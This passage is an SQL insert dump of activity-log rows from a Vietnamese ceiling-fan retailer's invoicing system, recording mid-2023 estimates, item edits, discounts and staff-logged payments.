(2286, 'invoice', 310, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-29 14:23:34'),
(2287, 'invoice', 310, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:36:\"Quạt trần 3 cánh gỗ PEARL 60 \";i:1;s:35:\"Quạt trần 3 cánh gỗ PEARL 60\";}', '17', 'Loan Nguyễn', '2023-06-29 14:23:53'),
(2288, 'estimate', 217, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:47:\"Haiku 60 inch Caramel Bamboo, Low Profile Black\";i:1;s:47:\"Haiku 60 inch Caramel Bamboo, Low Profile White\";}', '16', 'Phuc Dang', '2023-06-29 14:25:51'),
(2289, 'estimate', 217, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:426:\"Sải cánh 150cm (60 inch)       <br />\r\nMàu cánh: Caramel Bamboo        <br />\r\nMàu thân : Universal Black       <br />\r\nĐộng cơ EC, công suất 29.3W       <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm       <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)       <br />\r\nBộ đèn LED tuỳ chọn thêm       <br />\r\nThương hiệu: Haiku/USA \";i:1;s:383:\"Sải cánh 150cm (60 inch)       \r\nMàu cánh: Caramel Bamboo        \r\nMàu thân : Universal White       \r\nĐộng cơ EC, công suất 29.3W       \r\nĐiều khiển từ xa 7 tốc độ đi kèm       \r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)       \r\nBộ đèn LED tuỳ chọn thêm       \r\nThương hiệu: Haiku/USA\";}', '16', 'Phuc Dang', '2023-06-29 14:25:51'),
(2290, 'estimate', 217, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:425:\"Sải cánh 150cm (60 inch)       <br />\r\nMàu cánh: Caramel Bamboo        <br />\r\nMàu thân : Universal White       <br />\r\nĐộng cơ EC, công suất 29.3W       <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm       <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)       <br />\r\nBộ đèn LED tuỳ chọn thêm       <br />\r\nThương hiệu: Haiku/USA\";i:1;s:385:\"Sải cánh 150cm (60 inch)       \r\nMàu cánh: Caramel Bamboo        \r\nMàu thân : Low Profile White       \r\nĐộng cơ EC, công suất 29.3W       \r\nĐiều khiển từ xa 7 tốc độ đi kèm       \r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)       \r\nBộ đèn LED tuỳ chọn thêm       \r\nThương hiệu: Haiku/USA\";}', '16', 'Phuc Dang', '2023-06-29 14:27:52'),
(2291, 'estimate', 217, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:47:\"Haiku 60 inch Caramel Bamboo, Low Profile White\";}', '16', 'Phuc Dang', '2023-06-29 15:00:29'),
(2292, 'estimate', 217, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:31:\"Haiku L 60 inch White - Caramel\";}', '16', 'Phuc Dang', '2023-06-29 15:00:29'),
(2293, 'estimate', 217, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:31:\"Haiku L 60 inch White - Caramel\";}', '1', 'Ho Gia Phat', '2023-06-29 15:03:08'),
(2294, 'estimate', 217, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:31:\"Haiku L 52 inch White - Caramel\";}', '1', 'Ho Gia Phat', '2023-06-29 15:03:08'),
(2295, 'estimate', 217, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"23800000.00\";i:1;s:11:\"24300000.00\";}', '1', 'Ho Gia Phat', '2023-06-29 15:03:53'),
(2296, 'estimate', 217, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"24300000.00\";i:1;s:11:\"23800000.00\";}', '1', 'Ho Gia Phat', '2023-06-29 15:06:38'),
(2297, 'invoice', 310, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-29 16:04:20'),
(2298, 'invoice', 310, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"7.150.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/315\" target=\"_blank\">#315</a>\";}', '17', 'Loan Nguyễn', '2023-06-29 16:04:20'),
(2299, 'invoice', 308, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-29 16:04:53'),
(2300, 'invoice', 308, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.100.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/316\" target=\"_blank\">#316</a>\";}', '17', 'Loan Nguyễn', '2023-06-29 16:04:53'),
(2301, 'invoice', 306, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-29 16:05:38'),
(2302, 'invoice', 306, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"750.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/317\" target=\"_blank\">#317</a>\";}', '17', 'Loan Nguyễn', '2023-06-29 16:05:38'),
(2303, 'invoice', 301, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-29 16:06:07'),
(2304, 'invoice', 301, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/318\" target=\"_blank\">#318</a>\";}', '17', 'Loan Nguyễn', '2023-06-29 16:06:07'),
(2305, 'estimate', 212, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"3600000.00\";i:1;s:10:\"4500000.00\";}', '17', 'Loan Nguyễn', '2023-06-30 13:53:00'),
(2306, 'estimate', 212, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"4500000.00\";i:1;s:10:\"4582000.00\";}', '17', 'Loan Nguyễn', '2023-06-30 13:54:48'),
(2307, 'estimate', 218, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-30 16:53:10'),
(2308, 'estimate', 212, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"4582000.00\";i:1;s:10:\"3600000.00\";}', '17', 'Loan Nguyễn', '2023-06-30 17:41:10'),
(2309, 'estimate', 215, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:34:\"Thay mới động cơ quạt Sino\";i:1;s:4:\"1.00\";i:2;s:1:\"2\";}', '17', 'Loan Nguyễn', '2023-07-01 09:43:28'),
(2310, 'estimate', 215, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:26:\"Sửa chữa quạt trần\";i:1;s:34:\"Thay mới động cơ quạt Sino\";}', '17', 'Loan Nguyễn', '2023-07-01 09:43:28'),
(2311, 'estimate', 215, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:34:\"Thay mới động cơ quạt Sino\";i:1;s:0:\"\";}', '17', 'Loan Nguyễn', '2023-07-01 09:43:28'),
(2312, 'estimate', 215, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:26:\"Sửa chữa quạt trần\";}', '17', 'Loan Nguyễn', '2023-07-01 09:43:28'),
(2313, 'estimate', 215, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:24:\"Nhân công sửa chữa\";}', '17', 'Loan Nguyễn', '2023-07-01 09:43:28'),
(2314, 'estimate', 215, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:21:\"Bảo hành 03 tháng\";}', '17', 'Loan Nguyễn', '2023-07-01 10:33:24'),
(2315, 'estimate', 215, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:26:\"Sửa chữa quạt trần\";i:1;s:56:\"Sửa chữa quạt trần: thay bạc đạn cho quạt\";}', '17', 'Loan Nguyễn', '2023-07-01 10:33:24'),
(2316, 'estimate', 215, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:28:\"thay bạc đạn cho quạt\";i:1;s:21:\"Bảo hành 03 tháng\";}', '17', 'Loan Nguyễn', '2023-07-01 10:33:24'),
(2317, 'invoice', 286, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:4:\"0.00\";i:1;s:7:\"6800000\";}', '1', 'Ho Gia Phat', '2023-07-01 12:10:11'),
(2318, 'invoice', 286, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"40\";}', '1', 'Ho Gia Phat', '2023-07-01 12:10:11'),
(2319, 'invoice', 286, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2023-07-01 12:10:11'),
(2320, 'invoice', 286, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6800000.00\";i:1;s:10:\"6600000.00\";}', '1', 'Ho Gia Phat', '2023-07-01 12:10:53'),
(2321, 'invoice', 286, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6600000.00\";i:1;s:10:\"6800000.00\";}', '1', 'Ho Gia Phat', '2023-07-01 12:11:06'),
(2322, 'invoice', 311, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-07-03 13:31:51'),
(2323, 'estimate', 212, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/311\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-07-03 13:31:51'),
(2324, 'invoice', 311, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-03 13:31:55'),
(2325, 'invoice', 311, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-07-03 13:31:55'),
(2326, 'invoice', 311, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-03 13:32:37'),
(2327, 'invoice', 311, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"42.600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/319\" target=\"_blank\">#319</a>\";}', '17', 'Loan Nguyễn', '2023-07-03 13:32:37'),
(2328, 'estimate', 218, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:428:\"Sải cánh 150cm (60 inch)       <br />\r\nMàu cánh: Caramel Bamboo        <br />\r\nMàu thân : Low Profile Black       <br />\r\nĐộng cơ EC, công suất 29.3W       <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm       <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)       <br />\r\nBộ đèn LED tuỳ chọn thêm       <br />\r\nThương hiệu: Haiku/USA \";i:1;s:385:\"Sải cánh 150cm (60 inch)       \r\nMàu cánh: Caramel Bamboo        \r\nMàu thân : Low Profile Black       \r\nĐộng cơ EC, công suất 29.3W       \r\nĐiều khiển từ xa 7 tốc độ đi kèm       \r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)       \r\nBộ đèn LED tuỳ chọn thêm       \r\nThương hiệu: Haiku/USA\";}', '17', 'Loan Nguyễn', '2023-07-03 14:34:21'),
(2329, 'estimate', 218, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '17', 'Loan Nguyễn', '2023-07-03 14:34:50'),
(2330, 'invoice', 312, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-07-03 15:01:12'),
(2331, 'invoice', 312, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-03 15:01:17'),
(2332, 'invoice', 312, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-07-03 15:01:17'),
(2333, 'invoice', 312, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-07-03 15:26:47'),
(2334, 'invoice', 311, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '17', 'Loan Nguyễn', '2023-07-03 15:56:45'),
(2335, 'invoice', 312, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:539:\"Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";i:1;s:488:\"Sải cánh 132cm ( ~ 52inch)     \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     \r\nMàu cánh: nâu cánh gián   \r\nĐèn LED: 3 màu, 2700K - 3000K     \r\nĐiều khiển từ xa 5 tốc độ đi kèm     \r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";}', '17', 'Loan Nguyễn', '2023-07-05 09:56:40'),
(2336, 'estimate', 219, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-07-05 11:11:47'),
(2337, 'estimate', 219, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-07-05 11:12:17'),
(2338, 'estimate', 215, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-07-06 01:00:02'),
(2339, 'invoice', 312, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-06 11:09:58'),
(2340, 'invoice', 312, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.375.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/320\" target=\"_blank\">#320</a>\";}', '17', 'Loan Nguyễn', '2023-07-06 11:09:58'),
(2341, 'estimate', 220, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-07-06 11:50:50'),
(2342, 'estimate', 220, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-07-06 11:50:57'),
(2343, 'estimate', 220, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:429:\"Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Dark Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Đen   <br />\r\nMàu cánh: Dark Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China   <br />\r\n   <br />\r\n\";i:1;s:365:\"Sải cánh: 152cm (60 inch)   \r\nChất liệu cánh: Gỗ tự nhiên (Dark Wood)   \r\nĐộng cơ công suất 40W   \r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   \r\nMàu thân: Đen   \r\nMàu cánh: Dark Wood   \r\nĐiều khiển 5 tốc độ theo quạt   \r\nThương hiệu: Tổ chức đào tạo WIT / China\";}', '17', 'Loan Nguyễn', '2023-07-06 11:51:36'),
(2344, 'invoice', 313, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-07-06 11:55:53'),
(2345, 'estimate', 220, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/313\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-07-06 11:55:53'),
(2346, 'invoice', 313, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"40\";}', '17', 'Loan Nguyễn', '2023-07-06 11:56:19'),
(2347, 'invoice', 313, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-06 12:00:33'),
(2348, 'invoice', 313, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-07-06 12:00:33'),
(2349, 'invoice', 314, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-07-07 15:18:36'),
(2350, 'estimate', 218, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/314\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-07-07 15:18:36'),
(2351, 'invoice', 314, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-07 15:18:39'),
(2352, 'invoice', 314, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-07-07 15:18:39'),
(2353, 'invoice', 314, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"10\";}', '17', 'Loan Nguyễn', '2023-07-07 15:19:09'),
(2354, 'invoice', 314, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:1:\"5\";}', '17', 'Loan Nguyễn', '2023-07-07 15:19:09'),
(2355, 'invoice', 309, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-08 10:46:00'),
(2356, 'invoice', 309, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/321\" target=\"_blank\">#321</a>\";}', '17', 'Loan Nguyễn', '2023-07-08 10:46:00'),
(2357, 'invoice', 314, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-08 15:37:21'),
(2358, 'invoice', 314, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"20.445.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/322\" target=\"_blank\">#322</a>\";}', '17', 'Loan Nguyễn', '2023-07-08 15:37:21'),
(2359, 'invoice', 303, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-10 16:45:16'),
(2360, 'invoice', 303, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"950.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/323\" target=\"_blank\">#323</a>\";}', '17', 'Loan Nguyễn', '2023-07-10 16:45:16'),
(2361, 'invoice', 315, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-07-11 14:06:24'),
(2362, 'invoice', 315, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:329:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:298:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: 3 màu, 2700K - 3000K   \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2023-07-11 14:07:49'),
(2363, 'invoice', 315, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:4:\"0.00\";i:1;s:10:\"6300000.00\";}', '17', 'Loan Nguyễn', '2023-07-11 14:07:49'),
(2364, 'invoice', 315, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:36:\"Quạt trần SINO LED 52 White Wood\";i:1;s:11:\"63000001.00\";i:2;s:1:\"2\";}', '17', 'Loan Nguyễn', '2023-07-11 14:07:49'),
(2365, 'invoice', 315, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"35\";}', '17', 'Loan Nguyễn', '2023-07-11 14:07:49'),
(2366, 'invoice', 315, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-11 14:07:55'),
(2367, 'invoice', 315, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"8.845.200 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/324\" target=\"_blank\">#324</a>\";}', '17', 'Loan Nguyễn', '2023-07-11 14:07:55'),
(2368, 'invoice', 293, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:432:\"Sải cánh 150cm (60 inch)         <br />\r\nMàu cánh: Caramel Bamboo          <br />\r\nMàu thân : Universal White <br />\r\nĐộng cơ EC, công suất 29.3W         <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm         <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)         <br />\r\nBộ đèn LED tuỳ chọn thêm         <br />\r\nThương hiệu: Haiku/USA \";i:1;s:389:\"Sải cánh 150cm (60 inch)         \r\nMàu cánh: Caramel Bamboo          \r\nMàu thân : Universal White \r\nĐộng cơ EC, công suất 29.3W         \r\nĐiều khiển từ xa 7 tốc độ đi kèm         \r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)         \r\nBộ đèn LED tuỳ chọn thêm         \r\nThương hiệu: Haiku/USA\";}', '17', 'Loan Nguyễn', '2023-07-11 14:08:43'),
(2369, 'invoice', 293, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-11 14:08:52'),
(2370, 'invoice', 293, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"38.260.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/325\" target=\"_blank\">#325</a>\";}', '17', 'Loan Nguyễn', '2023-07-11 14:08:52'),
(2371, 'invoice', 316, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-07-12 16:25:47'),
(2372, 'invoice', 316, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-12 16:25:57'),
(2373, 'invoice', 316, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-07-12 16:25:57'),
(2374, 'invoice', 316, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:439:\"Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng/Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China   <br />\r\n   <br />\r\n\";i:1;s:375:\"Sải cánh: 152cm (60 inch)   \r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   \r\nĐộng cơ công suất 40W   \r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   \r\nMàu thân: Trắng/Đen   \r\nMàu cánh: Maple Wood   \r\nĐiều khiển 5 tốc độ theo quạt   \r\nThương hiệu: Tổ chức đào tạo WIT / China\";}', '17', 'Loan Nguyễn', '2023-07-12 16:26:34'),
(2375, 'invoice', 316, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '17', 'Loan Nguyễn', '2023-07-12 16:27:42'),
(2376, 'estimate', 219, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-07-13 01:00:38'),
(2377, 'invoice', 313, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-07-13 09:46:22'),
(2378, 'invoice', 317, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-07-13 09:56:43'),
(2379, 'invoice', 317, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"350000.00\";i:1;s:9:\"550000.00\";}', '1', 'Ho Gia Phat', '2023-07-13 09:58:56'),
(2380, 'invoice', 317, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:393:\"Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n\";i:1;s:353:\"Sải cánh 152cm ( ~ 60inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nTuỳ chọn đèn: N/A (không có)\";}', '1', 'Ho Gia Phat', '2023-07-13 09:58:56'),
(2381, 'invoice', 317, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2023-07-13 10:00:06'),
(2382, 'invoice', 317, 'invoice_activity_marked_as_sent', 'a:0:{}', '1', 'Ho Gia Phat', '2023-07-13 10:00:06'),
(2383, 'invoice', 317, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:27:\"Ống ty treo quạt trần\";i:1;s:28:\"Ống ty treo quạt trần.\";}', '1', 'Ho Gia Phat', '2023-07-13 10:05:07'),
(2384, 'invoice', 317, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:47:\"Ống ty treo quạt trần nhà ở, chung cư\";i:1;s:48:\"Ống ty treo quạt trần nhà ở, chung cư.\";}', '1', 'Ho Gia Phat', '2023-07-13 10:05:07'),
(2385, 'invoice', 317, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-07-13 17:17:08'),
(2386, 'invoice', 317, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.469.200 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/326\" target=\"_blank\">#326</a>\";}', '1', 'Ho Gia Phat', '2023-07-13 17:17:08'),
(2387, 'invoice', 307, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-07-14 06:40:26'),
(2388, 'invoice', 316, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-07-14 06:40:36'),
(2389, 'estimate', 221, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-07-14 11:22:19'),
(2390, 'estimate', 221, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-07-14 11:22:25'),
